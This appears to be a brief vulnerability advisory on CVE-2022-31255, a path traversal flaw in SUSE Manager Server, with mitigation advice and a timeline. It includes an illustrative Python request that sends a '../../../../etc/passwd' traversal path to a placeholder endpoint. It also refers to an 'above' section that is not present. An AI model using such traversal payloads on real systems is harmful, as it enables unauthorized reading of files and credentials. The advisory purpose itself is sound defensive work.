A recent vulnerability, CVE-2022-31255, has been discovered in the Spacewalk/Uyuni system of the SUSE Linux Enterprise Module for SUSE Manager Server. This vulnerability is caused by an Improper Limitation of a Pathname to a Restricted Directory (Path Traversal). This can allow remote attackers to access and read files that are available to the user operating the process, which is typically tomcat.

SUSE Manager Server 4.2

For the full list of affected packages and versions, refer to the content section above.

Exploit Details

The vulnerability lies in the improper limitation of a pathname to a restricted directory, which can potentially allow remote attackers to access and read files. This issue is typically caused by a lack of proper sanitization of user-supplied input (such as file paths), which can lead to unintended file access and exfiltration.

An example of a code snippet that can exploit this vulnerability might look like the following

import requests

target_url = "http://example.com/spacewalk_java_affected_endpoint";
malicious_file_path = "../../../../etc/passwd"

response = requests.get(f"{target_url}?file_path={malicious_file_path}")
print(response.text)

This code would send a request to the vulnerable endpoint on the target server, including a malicious file path in the request. If successful, this could enable the attacker to read the contents of the /etc/passwd file.

This vulnerability has been documented in the following locations

1. CVE-2022-31255
2. SUSE Security Announcement

Mitigation

To mitigate this vulnerability, users must update their SUSE Linux Enterprise Module for SUSE Manager Server systems and associated packages to the latest versions, or apply the necessary security patches. For more information on how to update your systems, refer to the SUSE documentation.

Conclusion

CVE-2022-31255 represents a significant security risk for users of SUSE Linux Enterprise Module for SUSE Manager Server and SUSE Manager Server. It is essential to ensure that your systems are up to date and that you have applied the necessary security patches to protect your data and infrastructure from potential exploitation.

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/16/2022 18:01:00 UTC